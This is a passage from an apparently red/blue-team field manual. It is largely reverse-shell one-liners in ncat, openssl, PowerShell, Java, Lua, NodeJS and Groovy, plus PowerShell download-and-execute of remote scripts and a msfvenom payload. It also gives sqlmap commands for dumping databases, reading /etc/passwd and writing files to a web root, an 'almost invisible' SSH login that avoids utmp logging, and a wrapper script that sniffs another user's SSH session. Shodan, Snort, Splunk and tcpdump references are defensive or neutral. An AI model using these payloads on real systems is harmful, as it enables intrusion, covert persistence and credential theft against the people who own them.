NCAT
ncat [Link] 4242 -e /bin/bash
ncat --udp [Link] 4242 -e /bin/bash

OPENSSL
ATTACKER:

user@attack$ openssl req -x509 -newkey rsa:4096 -keyout [Link] -

out [Link] -days 365 -nodes
user@attack$ openssl s_server -quiet -key [Link] -cert [Link] -
port 4242
or
user@attack$ ncat --ssl -vv -l -p 4242

272
VICTIM:
user@victim$ mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl
s_client -quiet -connect [Link]:4242 > /tmp/s; rm /tmp/s

POWERSHELL
powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object
[Link]("[Link]",4242);$stream =
$[Link]();[byte[]]$bytes = 0..65535|%{0};while(($i =
$[Link]($bytes, 0, $[Link])) -ne 0){;$data = (New-Object
-TypeName [Link]).GetString($bytes,0,
$i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 =
$sendback + "PS " + (pwd).Path + "> ";$sendbyte =
([[Link]]::ASCII).GetBytes($sendback2);$[Link]($sendby
te,0,$[Link]);$[Link]()};$[Link]()

powershell -nop -c "$client = New-Object

[Link]('[Link]',4242);$stream =
$[Link]();[byte[]]$bytes = 0..65535|%{0};while(($i =
$[Link]($bytes, 0, $[Link])) -ne 0){;$data = (New-Object
-TypeName [Link]).GetString($bytes,0,
$i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 =
$sendback + 'PS ' + (pwd).Path + '> ';$sendbyte =
([[Link]]::ASCII).GetBytes($sendback2);$[Link]($sendby
te,0,$[Link]);$[Link]()};$[Link]()"

powershell IEX (New-Object

[Link]).DownloadString('[Link]
taaldraad/204928a6004e89553a8d3db0ce527fd5/raw/fe5f74ecfae7ec0f2d50
895ecf9ab9dafe253ad4/mini-reverse.ps1')

JAVA
r = [Link]()
p = [Link](["/bin/bash","-c","exec 5<>/dev/tcp/[Link]/4242;cat
<&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
[Link]()

Java Alt1
String host="[Link]";
int port=4444;
String cmd="[Link]";
Process p=new
ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new
Socket(host,port);InputStream
pi=[Link](),pe=[Link](),
si=[Link]();OutputStream
po=[Link](),so=[Link]();while(![Link]()){
while([Link]()>0)[Link]([Link]());while([Link]()>0)s

273
[Link]([Link]());while([Link]()>0)[Link]([Link]());[Link]
ush();[Link]();[Link](50);try {[Link]();break;}catch
(Exception e){}};[Link]();[Link]();

Java Alternative 2
Thread thread = new Thread(){
public void run(){
// Reverse shell here
}
}
[Link]();

WAR
msfvenom -p java/jsp_shell_reverse_tcp LHOST=[Link] LPORT=4242 -f
war > [Link]
strings [Link] | grep jsp # in order to get the name of the
file

LUA
**Linux ONLY
lua -e
"require('socket');require('os');t=[Link]();t:connect('[Link]
','4242');[Link]('/bin/sh -i <&3 >&3 2>&3');"

Windows & Linux

lua5.1 -e 'local host, port = "[Link]", 4242 local socket =
require("socket") local tcp = [Link]() local io = require("io")
tcp:connect(host, port); while true do local cmd, status, partial =
tcp:receive() local f = [Link](cmd, "r") local s = f:read("*a")
f:close() tcp:send(s) if status == "closed" then break end end
tcp:close()'

NodeJS
(function(){
var net = require("net"),
cp = require("child_process"),
sh = [Link]("/bin/sh", []);
var client = new [Link]();
[Link](4242, "[Link]", function(){
[Link]([Link]);
[Link](client);
[Link](client);
});
return /a/; // Prevents the [Link] application form crashing
})();

or

274
require('child_process').exec('nc -e /bin/sh [Link] 4242')

or

-var x = [Link]
-x('child_process').exec('nc [Link] 4242 -e /bin/bash')

or

[Link]

GROOVY
String host="[Link]";
int port=4242;
String cmd="[Link]";
Process p=new
ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new
Socket(host,port);InputStream
pi=[Link](),pe=[Link](),
si=[Link]();OutputStream
po=[Link](),so=[Link]();while(![Link]()){
while([Link]()>0)[Link]([Link]());while([Link]()>0)s
[Link]([Link]());while([Link]()>0)[Link]([Link]());[Link]
ush();[Link]();[Link](50);try {[Link]();break;}catch
(Exception e){}};[Link]();[Link]();

Groovy Alt1
[Link] {
// Reverse shell here
}

SPAWN INTERPRETER TTY SHELL

/bin/sh -i
python3 -c 'import pty; [Link]("/bin/sh")'
python3 -c "__import__('pty').spawn('/bin/bash')"
python3 -c "__import__('subprocess').call(['/bin/bash'])"

perl -e 'exec "/bin/sh";'

perl: exec "/bin/sh";
perl -e 'print `/bin/bash`'
ruby: exec "/bin/sh"
lua: [Link]('/bin/sh')
vi: :!bash
vi: :set shell=/bin/bash:shell
nmap: !sh
mysql: ! bash

INTERACTIVE REVERSE SHELL WINDOWS

275
**Pseudo Console (ConPty) in Windows ConPtyShell uses the function
CreatePseudoConsole(). This function is available since Windows 10
/ Windows Server 2019 version 1809 (build 10.0.17763).

Server Side:
stty raw -echo; (stty size; cat) | nc -lvnp 3001

Client Side:
IEX(IWR
[Link]
voke-ConPtyShell.ps1 -UseBasicParsing); Invoke-ConPtyShell [Link]
3001

REFERENCE:
[Link]
%20and%20Resources/Reverse%20Shell%[Link]
[Link]
[Link]

S
S S
SHODAN
RED/BLUE TEAM RECON/ASSET DISCOV ALL

SHODAN CLI
To install Shodan CLI:
# easy_install shodan
Or upgrade existing Shodan Python library:
# easy_install -U shodan

276
Once installed initialize the environment with your API key using
shodan init:
# shodan init YOUR_API_KEY
*Get your API key from your Shodan account page

Display Shodan query and scan credits available:

# shodan info

Show your external IP:

# shodan myip

Show information about an IP:

# shodan host <IPAddress>

Show the count of results for a search:

# shodan count <search string>
# shodan count WebBox

Show statistical information about a service:

# shodan stats --facets <facet> <string> country:<##>
# shodan stats --facets [Link] apache country:CN

Search banner information for text string and display IP, port,
organization, and hostnames:
# shodan search --fields ip_str,port,org,hostnames <string> | tee
search_results.txt

Search a specific country banner information for text string and

display IP, port, organization, and hostnames:
# shodan search --fields ip_str,port,org,hostnames <string>
country:<##>| tee search_results.txt

Download lets you send JSON results into a file:

# shodan download <outfile> <search query>
# shodan download Microsoft-data Microsoft iis 6.0

Shodan network scanning request:

# shodan scan submit --filename scan_results.txt <IPAddress or
CIDR>

Stream live Shodan scanning results:

# shodan stream --datadir /dir/path/results
# shodan stream --ports 80,443,3389

Real-Time network alert streaming/monitoring:

# shodan alert create “Scan results” <IP/CIDR>
Successful created network alert!

277
Alert ID: 6F2SCAZ6WV3CIAKE
# shodan stream --alert=<Alert ID> --datadir=scan-results/

Scan the entire internet *Enterprise license

# shodan scan internet <port> <protocol>

Query & display subdomains, records, IP, and ports

# shodan domain [Link] -D

SHODAN WEB UI ([Link])

Shodan IP address search:
> [Link]
> [Link]/24

Shodan filter search results 'filter:value':

> city:"Istanbul" port:23,3389
**Filters:
category = ics, malware, etc… ; category:ics
city = city name; city:beijing
country = country name; country:china
hostname = find matching device hostname; server:”gws”
hostname:”google”
net = show results only in cidr range; net:[Link]/24
org = narrow based on organization; org:”AT&T”
port = service port; port=23,22,3389
product = service running; product=openssh
geo = geo coordinates; geo:”56.7492,118.2640”
os = operating system; os:”windows 10”
before/after = devices in time range; apache after:21/01/2019
before:14/02/2019

Find websites that are clones by searching in the “Raw Data View”
in a result & searching for the “[Link].html_hash” value. Then
search for that value:
> hash:-1604454775

Raw Data Facets: [Link]

REFERENCE:
[Link]
[Link]
[Link]

S S
SNORT
BLUE TEAM THREAT HUNT/DETECT ALL

278
Snort is an open-source, free and lightweight network intrusion
detection system.

BASIC SNORT RULE HEADER OUTLINE

[action][protocol][sourceIP][sourcePORT]->[destIP][destPORT]([Rule Options])

EXAMPLE SNORT RULE

RULE HEADER alert tcp $EXTERNAL_NET $HTTP_PORTS - > $HOME_NET any

MESSAGE msg: "BROWSER-IE Microsoft Internet Explorer CacheSize
exploit attempt";
FLOW flow: to_client,established;
DETECTION file_data;
content:"recordset"; offset:14; depth:9;
content:".CacheSize"; distance:0; within:100;
pcre:"/CacheSize\s*=\s*/";
byte_test:10,>,0x3ffffffe,0,relative,string;
METADATA policy max-detect-ips drop, service http;
REFERENCES reference:cve,2016-8077;
CLASSIFICATION classtype: attempted-user;
SIGNATUREid sid:65535;rev:1;

REFERENCE:
[Link]
[Link]
[Link]/production/document_files/files/000/000/116/original/
Snort_rule_infographic.pdf

S S
SPLUNK
BLUE TEAM THREAT HUNT/DETECT ALL
Splunk is a software platform to search, analyze and visualize the
machine-generated data gathered from the websites, applications,
sensors, devices etc. which make up IT infrastructure.

Extract data from events

into fields so that you can
analyze and run reports on
ADD FIELDS it in a meaningful way.
Extract field/value pairs
and reload field extraction
* | extract reload=true settings from disk.
Extract field/value pairs
that are delimited by "|;",
* | extract pairdelim="|;", and values of fields that
kvdelim="=:", auto=f are delimited by "=:".
Extract the COMMAND field
* | multikv fields COMMAND filter when it occurs in rows that
splunkd contain "splunkd".

279
 Automatically extracts
fields from XML-formatted
* | xmlkv data.
Extract "from" and "to"
fields using regular
expressions. If a raw event
contains "From: Susan To:
* | rex field=_raw "From: Bob", then from=Susan and
(?<from>.*) To: (?<to>.*)" to=Bob.
Add the field: comboIP.
* | strcat sourceIP "/" destIP Values of comboIP =
comboIP "sourceIP + "/" + destIP".
Add the field: velocity.
Values of velocity =
distance field value / time
field value (using an SQLite
* | eval velocity=distance/time evaluation).
Add location information
(based on IP address) to the
first twenty events that
404 host=webserver1 | head 20 | contain "404" and are from
iplocation from webserver1.
Change the names of fields,
the units of values stored
in fields, the types of
data stored in fields, or
CONVERT FIELDS the attributes of fields.
Convert every field value to
a number value except for
values in the field "foo"
(use the {{none}} argument
to specify fields to
* | convert auto(*) none(foo) ignore).
Change all memory values in
* | convert memk(virt) the virt field to Kilobytes.
Change the sendmail syslog
duration format (D+HH:MM:SS)
to seconds. For example, if
delay="[Link]", the
resulting value will be
* | convert dur2sec(delay) delay="615".
Convert values of the
duration field into number
value by removing string
values in the field value.
For example, if
duration="212 sec", the
resulting value will be
* | convert rmunit(duration)}} duration="212".

280
 Rename the _ip field as
* | rename _ip as IPAddress IPAddress.
Change any host value that
* | replace *localhost with ends with "localhost" to
localhost in host "localhost".
Filter and re-arrange how
Splunk displays fields
FILTER AND ORDER FIELDS within search results.
Keep only the host and ip
fields, and display them in
* | fields host, ip the order: host, ip.
Keep only the host and ip
fields, and remove all
internal fields (for
example, _time, _raw, etc.)
that may cause problems in
* | fields + host, ip Splunk Web.
Remove the host and ip
* | fields - host, ip fields.
Filter search result sets by
removing duplicate events,
using regular expressions,
or by searching within a
FILTER RESULTS result set.
Keep only search results
* | search src="10.9.165.*" OR that have matching src or
dst="[Link]" dst values.
Keep only search results
whose _raw field contains IP
* | regex addresses in the non-
_raw=(?<!\d)10.\d{1,3}\.\d{1,3}\.\ routable class A
d{1,3}(?!\d ([Link]/8).
Remove duplicates of results
* | dedup host with the same host value.
rex is for extracting a
pattern and storing it as a
* Fatal | rex "(?i) msg=(?P[^,]+)" new field.
regex is like grep and can
use regular expressions
* | regex _raw=".*Fatal.*" against output results..
Sort, re-order, or return a
portion of a search result
ORDER RESULTS set.
Sort results by ip value in
ascending order and then by
url value in descending
* | sort ip, -url order.
Reverse the order of a
* | reverse result set.
* | head 20 Return the first 20 results.

281
 Return the last 20 results
* | tail 20 (in reverse order).
Return first 1000 lines of
log file and order top 50
* | head 1000 | top 50 method results.
Group search results into a
transaction (a single
observation of any event
stretching over multiple
logged events) based on
related pieces of
information, or group
results by statistical
GROUP RESULTS correlation.
Group search results that
have the same host and
cookie, occur within 30
seconds of each other, and
* | transaction do not have a pause greater
fields="host,cookie" maxspan=30s than 5 seconds between each
maxpause=5s event into a transaction.
Group search results that
share the same value of
from, with a maximum span of
30 seconds, and a pause
between events no greater
* | transaction fields=from than 5 seconds into a
maxspan=30s maxpause=5s transaction.
Group search results into 4
clusters based on the values
* | kmeans k=4 date_hour of the date_hour and
date_minute date_minute fields.
Cluster events together,
sort them by their
* | cluster t=0.9 showcount=true | cluster_count values, and
sort -cluster_count | head 20}}|| then return the 20 largest
Classify events as a type
(event type), or have Splunk
automatically classify
CLASSIFY EVENTS events.
Force Splunk to apply event
types that you have
configured (Splunk Web
automatically does this when
you view the eventtype
* | typer field).
Have Splunk automatically
discover and apply event
types to events that contain
error | typelearner the string "error".

282
 Generate search results from
your data using commands
other than search. You must
use a pipe ( | ) before any
data-generating command that
CHANGE DISPLAY FORMATTING isn't the search command.
Read in results from the CSV
file:
$SPLUNK_HOME/var/run/splunk/
[Link], keep any that
contain the file:
| inputcsv [Link] | search error $SPLUNK_HOME/var/run/splunk/
| outputcsv [Link] [Link]
Display events from the file
messages.1 as if the events
| file /var/log/messages.1 were indexed in Splunk.
| savedsearch mysecurityquery AND Run the mysecurityquery
_count > 0 or | sendemail saved search, and email any
to=user@[Link] results to user@[Link].
Summarize the results of any
search as a report by
performing statistical
operations, and graphing
REPORTING functions.
Return the least common
* | rare url values of the url field.
Return the 20 most common
* | top limit=20 url values of the url field.
Remove duplicates of results
with the same host value and
return the total count of
* | stats dc(host) the remaining results.
Return the average for each
hour, of any unique field
that ends with the string
"lay" (for example, delay,
* | stats avg(*lay) BY date_hour xdelay, relay, etc).
Search the access logs, and
sourcetype=access_combined | top return the number of hits
limit=100 referer_domain | stats from the top 100 values of
sum(count) referer_domain.
Search the access logs, and
return the results
associated with each other
sourcetype=access_combined | (that have at least 3
associate supcnt=3 references to each other).
Return the average (mean)
* | chart avg(size) by host size for each distinct host.
* | chart max(delay) by size Return the the maximum delay
bins=10 by size, where size is

283
 broken down into a maximum
of 10 equal sized buckets.
* | timechart span=5m avg(thruput) Graph the average thruput of
by host hosts over time.
Create a timechart of
average cpu_seconds by host,
and remove data (outlying
* | timechart avg(cpu_seconds) by values) that may distort the
host | outlier action=TR timechart's axis.
Search for all ps events,
extract values, and
calculate the average value
sourcetype=ps | multikv | of CPU each minute for each
timechart span=1m avg(CPU) by host host.
Create a timechart of the
count of from web sources by
sourcetype=web | timechart count host, and fill all null
by host | fillnull value=NULL values with "NULL".
* | contingency datafield1
datafield2 maxrows=5 maxcols=5 Build a contingency table of
usetotal=F datafields from all events.
Calculate the co-occurrence
correlation between all
* | correlate type=cocur fields.
Calculate the sums of the
numeric fields of each
result, and put the sums in
* | addtotals fieldname=sum the field sum.
* | anomalousvalue action=filter Return events with uncommon
pthresh=0.02 values.
Bucket search results into
10 bins, and return the
* | bucket size bins=10 | stats count of raw events for each
count(_raw) by size bucket.
Return the average thruput
* | bucket _time span=5m | stats of each host for each 5
avg(thruput) by=_time host minute time span.
* | stats sum(<field>) as result | Sum up a field and do some
eval result=(result/1000) arithmetics:
Determine the size of log
events by checking len() of
* | eval raw_len=len(_raw) | stats _raw. The p10() and p90()
avg(raw_len), p10(raw_len), functions are returning the
p90(raw_len) by sourcetype 10 and 90 percentiles:
Calculate the co-occurrence
correlation between all
* | correlate type=cocur fields.
Calculate the sums of the
* | addtotals fieldname=sum numeric fields of each

284
 result, and put the sums in
the field sum.
Search for all ps events,
extract values, and
calculate the average value
of CPU each sourcetype=ps |
multikv | timechart span=1m
sourcetype=ps | multikv | avg(CPU) by hostminute for
timechart span=1m avg(CPU) by host each host.
Perform administration tasks
using search commands. Crawl
your servers to discover
more data to index, view
configuration settings, or
ADMINISTRATIVE see audit information.
Crawl root and home
directories and add all
possible inputs found (adds
| crawl root="/;/Users/" | input configuration information to
add [Link]).
View processing properties
stored in [Link] - time
zones, breaking characters,
| admin props etc.
View audit trail information
stored in the local audit
index. Also decrypt signed
audit events while checking
index=audit | audit for gaps and tampering.
| eventcount summarize=false
index=* | dedup index | fields
index List all Indices
| eventcount summarize=false
report_size=true index=* | eval
size_MB = List all Indices of a
round(size_bytes/1024/1024,2) certain size.
Use subsearches to use
search results as an
argument to filter search
result sets with more
SUBSEARCH granularity.
Return values of URL that
* | set diff [search 404 | fields contain the string "404" or
url] [search 303 | fields url] "303" but not both.
login root | localize maxspan=5m Search for events around
maxpause=5m | map search="search events associated with
failure "root" and "login", and then
starttimeu=$starttime$ endtimeu=$e search each of those time
ndtime$" ranges for "failure".

285
 Create a search string from
the values of the host,
[* | fields + source, sourcetype, source and sourcetype
host | format ] fields.
EMAIL RESULTS
By appending "sendemail" to
... | sendemail any query you get the result
to="john@[Link]" by mail!

Uncoder: One common language for cyber security

[Link]
[Link] is the online translator for SIEM saved searches,
filters, queries, API requests, correlation and Sigma rules to help
SOC Analysts, Threat Hunters and SIEM Engineers. Easy, fast and
private UI you can translate the queries from one tool to another
without a need to access to SIEM environment and in a matter of
just few seconds.
[Link] supports rules based on Sigma, ArcSight, Azure Sentinel,
Elasticsearch, Graylog, Kibana, LogPoint, QRadar, Qualys, RSA
NetWitness, Regex Grep, Splunk, Sumo Logic, Windows Defender ATP,
Windows PowerShell, X-Pack Watcher.

REFERENCE:
[Link]
[Link]

S S
SQLMAP
RED TEAM EXPLOITATION WEB/DATABASE
sqlmap is an open source penetration testing tool that automates
the process of detecting and exploiting SQL injection flaws and
taking over of database servers.

Simple mapping option

sqlmap -u "[Link]

Use TOR SOCKS5 Proxy

sqlmap -u "[Link] --tor --tor-type=SOCKS5

Manually set the return time

sqlmap -u "[Link] --time-sec 15

List all databases located at target site

sqlmap -u "[Link] --dbs

List all tables in a database:

286
sqlmap -u "[Link] -D site_db --tables

Use authentication cookie:

sqlmap -u "[Link] --data="id=1&str=val" -p
"pid" -b --cookie="cookie1=<cookie_value1>;cookie2=<cookie_value2>"
--random-agent --risk 3 --level 5

Use credentials to dump database table:

sqlmap -u "[Link] –method "POST" –data
"username=user&password=user&submit=Submit" -D database_name -T
users –dump

Dump only selected columns

sqlmap -u "[Link] -D site_db -T users -C
username,password --dump

List all columns in a table

sqlmap -u "[Link] -D database_name -T users
--columns

Dump database table content:

sqlmap -u "[Link] -D database_name -T users
–dump

Use SQLMap OS Shell:

sqlmap --dbms=mysql -u "[Link] --os-shell

Use SQLMap SQL Shell:

sqlmap --dbms=mysql -u "[Link] --sql-shell

Dump all
sqlmap -u [Link] -D database_name -T
table_name --dump-all

Checking Privileges
sqlmap -u [Link] --privileges | grep FILE

Reading file
sqlmap -u <URL> --file-read=<file to read>

sqlmap -u [Link] --file-read=/etc/passwd

Writing file
sqlmap -u <url> --file-write=<file> --file-dest=<path>

287
sqlmap -u [Link] --file-write=[Link] --
file-dest=/var/www/html/[Link]

POST
sqlmap -u <POST-URL> --data="<POST-paramters> "

sqlmap -u [Link] --data

"uname=teste&passwd=&submit=Submit" -p uname

You can also use a file like with the post request:
./[Link] -r [Link] -p uname

Launch all tamper scripts at once:

sqlmap -u '[Link] --
level=5 --risk=3 -p 'item1' --
tamper=apostrophemask,apostrophenullencode,appendnullbyte,base64enc
ode,between,bluecoat,chardoubleencode,charencode,charunicodeencode,
concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnu
ll2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiples
paces,nonrecursivereplacement,percentage,randomcase,randomcomments,
securesphere,space2comment,space2dash,space2hash,space2morehash,spa
ce2mssqlblank,space2mssqlhash,space2mysqlblank,space2mysqldash,spac
e2plus,space2randomblank,sp_password,unionalltounion,unmagicquotes,
versionedkeywords,versionedmorekeywords

REFERENCE:
[Link]
sheets/blob/master/docs/[Link]
[Link]
bypass/423

S S
SSH
ALL ADMINISTRATION WINDOWS/LINUX/MacOS

BASIC
COMMAND DESCRIPTION
sshpass -p '<your-passwd>' ssh
<username>@<ssh_host>, brew install ssh without input
sshpass password
apt-get install openssh, apt-get install
openssh-server Install sshd server
service sshd restart, systemctl reload
[Link] Restart sshd server
ssh -o StrictHostKeyChecking=no -p 2702
root@[Link] date Run ssh command

288
ssh -vvv -p 2702 root@[Link] date ssh with verbose
2>&1 output
sshuttle -r kubo@[Link] [Link]/16 Setup ssh tunnel for
[Link]/24 -e ... your web browsing
ssh-copy-id <username>@<ssh_host>, Or
manually update ~/.ssh/authorized_keys SSH passwordless login
ssh-keygen -f ~/.ssh/known_hosts -R Remove an entry from
[Link] known_hosts file
diff local_file.txt <(ssh
<username>@<ssh_host> 'cat Diff local file with
remote_file.txt') remote one
diff <(ssh user@remote_host 'cat
[Link]') <(ssh user2@remote_host2 Diff two remote ssh
'cat [Link]') files
Upload with
scp -rp /tmp/abc/ ec2-user@<ssh- timestamps/permissions
host>:/root/ kept
exec ssh-agent bash && ssh-add
/tmp/id_rsa, ssh-add SSH agent load key
SSH list all loaded
ssh-add -l key
exec ssh-agent bash && ssh-keygen, ssh- SSH agent create and
add load key
emacs Emacs read remote file
/ssh:<username>@<ssh_host>:/path/to/file with tramp
ssh-keygen, ssh-keygen -C Generate a new key
"your_email@[Link]" -t rsa pair
ssh-keygen -t rsa -f /tmp/sshkey -N "" - Generate key pair
q without interaction
ADVANCED
Add passphrase
protection to ssh
ssh-keygen -p -f id_rsa keyfile
configure SSH to avoid
ssh -o IdentitiesOnly=yes -i [Link] trying all identity
myuser@[Link] files
Convert OpenSSL format
ssh-keygen -f my_ssh.pub -i to SSH-RSA format
~/.ssh/authorized_keys, ~/.ssh/config, Critical ssh
~/.ssh/known_hosts files/folders
/etc/ssh/ssh_config,
/etc/ssh/sshd_config SSH config file
SSH key file
chmod 600 ~/.ssh/id_rsa permission
chmod 700 ~/.ssh, chown -R $USER:$USER
~/.ssh SSH folder permission
Authorized_keys file
chmod 644 ~/.ssh/authorized_keys permission
Mute Warning:
ssh -o LogLevel=error Permanently added

289
TUNNELING/PROXY
ssh -N -i <ssh-keyfile> -f
root@[Link] -L SSH port forward to a
*:18085:localhost:8085 -n /bin/bash local port
No logs created in
ssh -o UserKnownHostsFile=/dev/null -T
/var/log/utmp or bash
user@[Link] "bash -i"
profiles
ssh -g -L31337:[Link]:80 user@[Link] SSH Tunnel OUT
ssh -o ExitOnForwardFailure=yes -g -
R31338:[Link]:80 user@[Link] SSH Tunnel IN
SSH socks4/5 IN,
ssh -g -R 1080 user@[Link] access local network
through proxy
SSH socks4/5 OUT,
revserse dynamic
ssh -D 1080 user@[Link] forwarding
ssh -R *:40099:localhost:22
root@[Link], ssh -p 40099 Reverse port forward
root@[Link] to remote server
sshuttle -r kubo@[Link] [Link]/16
[Link]/24 [Link]/24 Setup SSH tunnel for
[Link]/24 your web browsing
SECURITY
sed -i 's/PasswordAuthentication
yes/PasswordAuthentication no/g' Disable SSH by
/etc/ssh/sshd_config password
sed -i 's/^PermitRootLogin
yes/#PermitRootLogin yes/'
/etc/ssh/sshd_config Disable root login
StrictHostKeyChecking yes change Enable/Disable SSH
~/.ssh/config Host Key Checking
Protect SSH server
from brute force
fail2ban command line tool attacks
SCP
scp -r ec2-user@<ssh- Download a remote
host>:/home/letsencrypt-20180825 ./ folder
scp -i <ssh-keyfile> /tmp/hosts ec2-
user@<ssh-host>:/root/ Upload a file
scp -r /tmp/abc/ ec2-user@<ssh-
host>:/root/ Upload a folder
Upload with
scp -rp /tmp/abc/ ec2-user@<ssh- timestamps/permissions
host>:/root/ kept
sshfs name@server:/path/remote_folder Mount remote directory
/path/local_folder as local folder
SSH LOGS
grep -R "ssh.*Received signal 15"
/var/log/[Link] Events of SSH down

290
 grep -R "sshd.*Server listening"
/var/log/[Link] Events of SSH up
grep -R "sshd.*Failed password for Events of SSH failed
invalid user" /var/log/[Link] login
grep -R "sshd.*POSSIBLE BREAK-IN Events of SSH break-in
ATTEMPT!" /var/log/[Link] attempt
grep -R "sshd.*Bad protocol version Events of SSH port
identification" /var/log/[Link] scap
grep -R "sshd.*Accepted publickey for" Events of SSH login by
/var/log/[Link] public key
grep -R "sshd.*Accepted password for" Events of ssh login by
/var/log/[Link] password
grep -R "sshd.*pam_unix(sshd:session): Events of ssh logout
session closed for" /var/log/[Link] event
SSH TOOLS
Export local env to
[Link] Internet
sshuttle Reverse ssh proxy
sshpass sshpass -p “$PASSWORD” ssh -o
StrictHostKeyChecking=no SSH by auto input
$username@$ssh_ip= password

Almost invisible SSH

# ssh -o UserKnownHostsFile=/dev/null -T user@[Link] "bash -i"

This will not add your user to the /var/log/utmp file and you won't
show up in w or who command of logged in users. It will
bypass .profile and .bash_profile as well. On your client side it
will stop logging the host name to ~/.ssh/known_hosts.

SSH tunnel OUT

We use this all the time to circumvent local firewalls and IP
filtering:
$ ssh -g -L31337:[Link]:80 user@[Link]

You or anyone else can now connect to your computer on port 31337
and get tunneled to [Link] port 80 and appear with the source IP
of '[Link]'.

SSH tunnel IN
We use this to give access to a friend to an internal machine that
is not on the public Internet:

$ ssh -o ExitOnForwardFailure=yes -g -R31338:[Link]:80

user@[Link]

Anyone connecting to [Link] will get tunneled to

[Link] on port 80 via your computer.

291
VPN over SSH
Tunnel layer 3 network traffic via an established ssh channel.
Allows perform SYN-scan with nmap and use your tools directly. Need
root on both sides to create a tun devices. These lines should be
present in your /etc/ssh/sshd_config file (server-side):
PermitRootLogin yes
PermitTunnel yes

Create a pair of tun devices on client and server:

ssh username@server -w any:any

Configuring client-side interface:

ip addr add [Link]/32 peer [Link] dev tun0

Configuring server-side interface:

ip addr add [Link]/32 peer [Link] dev tun0

Enable ip forwarding and NAT on the server:

echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A POSTROUTING -s [Link] -o eth0 -j MASQUERADE

Now you can make the peer host [Link] your default gateway or
route a specific host/network through it:
route add -net [Link]/16 gw [Link]

**This example the server’s external network interface is eth0 and

the newly created tun devices on both sides are tun0.

SSH socks4/5 OUT

Reverse dynamic forwarding. Tunnel all your browser traffic through
your server use SOCKS with [Link]:1080. (OpenSSH 7.6+)

$ ssh -D 1080 user@[Link]

SSH socks4/5 IN
Give team members access to your local network or let others use
your host as an end-point by them configuring [Link] as
their SOCKS4/5 proxy.
$ ssh -g -R 1080 user@[Link]

Sniff a user's SSH session

$ strace -e trace=read -p <PID> 2>&1 | while read x; do echo "$x" |
grep '^read.*= [1-9]$' | cut -f2 -d\"; done

Non-root sniff a user's SSH session

If /proc/sys/kernel/yama/ptrace_scope is set to 1 then create a
wrapper script called 'ssh' that executes strace + ssh to log the

292
session. SSH session will be sniffed and logged to ~/.ssh/logs/ the
next time the user logs into his shell:

# Add a local path to the PATH variable so our 'ssh' is executed

instead of the real ssh:
$ echo '$PATH=~/.local/bin:$PATH' >>~/.profile

# Create a log directory and our own ssh binary

$ mkdir -p ~/.local/bin ~/.ssh/logs

$ cat >~/.local/bin/ssh
#! /bin/bash
strace -e trace=read -o '! ~/.local/bin/ssh-log $$' /usr/bin/ssh $@
# now press CTRL-d to close the file.

$ cat ~/.local/bin/ssh-log
#! /bin/bash
grep 'read(4' | cut -f2 -d\" | while read -r x; do
if [ ${#x} -ne 2 ] && [ ${#x} -ne 1 ]; then continue; fi
if [ x"${x}" == "x\\n" ] || [ x"${x}" == "x\\r" ]; then
echo ""
else
echo -n "${x}"
fi
done >~/.ssh/.logs/ssh-log-"${1}"-`date +%s`.txt
# now press CTRL-d to close the file

$ chmod 755 ~/.local/bin/ssh ~/.local/bin/ssh-log

REFERENCE:
[Link]
[Link]

293
T
T T
TCPDUMP
RED/BLUE TEAM NETWORK TRAFFIC LINUX/MacOS

BASIC SYNTAX
Match any traffic involving [Link] as destination or source
# tcpdump -i eth1 host [Link]

Match particular source only

# tcpdump -i eth1 src host [Link]

Match particular destination only

# tcpdump -i eth1 dst host [Link]

Match any traffic involving port 25 as source or destination

# tcpdump -i eth1 port 25

Source port 25
# tcpdump -i eth1 src port 25

Destination port 25
# tcpdump -i eth1 dst port 25

Network filtering:
# tcpdump -i eth1 net 192.168
# tcpdump -i eth1 src net 192.168

294
# tcpdump -i eth1 dst net 192.168

Protocol filtering:
# tcpdump -i eth1 arp
# tcpdump -i eth1 ip
# tcpdump -i eth1 tcp
# tcpdump -i eth1 udp
# tcpdump -i eth1 icmp

Boolean Expressions :
Negation : ! or "not" (without the quotes)
Concatenate : && or "and"
Alternate : || or "or"

Match any TCP traffic on port 80 (web) with [Link] or

[Link] as destination host
# tcpdump -i eth1 '((tcp) and (port 80) and ((dst host
[Link]) or (dst host [Link])))'

Match any ICMP traffic involving the destination with physical/MAC

address [Link]
# tcpdump -i eth1 '((icmp) and ((ether dst host
[Link])))'

Match any traffic for the destination network 192.168 except

destination host [Link]
# tcpdump -i eth1 '((tcp) and ((dst net 192.168) and (not dst host
[Link])))'

ADVANCED FILTERING
Match the IP header has options set.
In binary
# tcpdump -i eth1 'ip[0] & 15 > 5'
In hexadecimal
# tcpdump -i eth1 'ip[0] & 0xf > 5'

Match any fragmentation occurring

# tcpdump -i eth1 'ip[6] = 64'

Matching the fragments and the last fragments

# tcpdump -i eth1 '((ip[6:2] > 0) and (not ip[6] = 64))'

Match traceroute usage on the network

# tcpdump -i eth1 'ip[8] < 5'

295
Matching packets longer than X bytes; Where X is 600 bytes
# tcpdump -i eth1 'ip[2:2] > 600'

Matching any TCP traffic with a source port > 1024

# tcpdump -i eth1 'tcp[0:2] > 1024'

Match packets with only the SYN flag set, the 14th byte would have
a binary value of 00000010 which equals 2 in decimal.
# tcpdump -i eth1 'tcp[13] = 2'

Matching SYN, ACK (00010010 or 18 in decimal)

# tcpdump -i eth1 'tcp[13] = 18'

Matching either SYN only or SYN-ACK datagrams

# tcpdump -i eth1 'tcp[13] & 2 = 2'

Matching PSH-ACK packets

# tcpdump -i eth1 'tcp[13] = 24'

Matching any combination containing FIN

# tcpdump -i eth1 'tcp[13] & 1 = 1'

Matching RST flag

# tcpdump -i eth1 'tcp[13] & 4 = 4'

Easier way to filter flags

# tcpdump -i eth1 'tcp[tcpflags] == tcp-ack'

Matching all packages with TCP-SYN or TCP-FIN set :

# tcpdump 'tcp[tcpflags] & (tcp-syn|tcp-fin) != 0

Match any packet containing the "MAIL" command from SMTP exchanges.
# tcpdump -i eth1 '((port 25) and (tcp[20:4] = 0x4d41494c))'

Match any packets containing GET requests

# tcpdump -i eth1 'tcp[32:4] = 0x47455420'

SSH connection (on any port) :
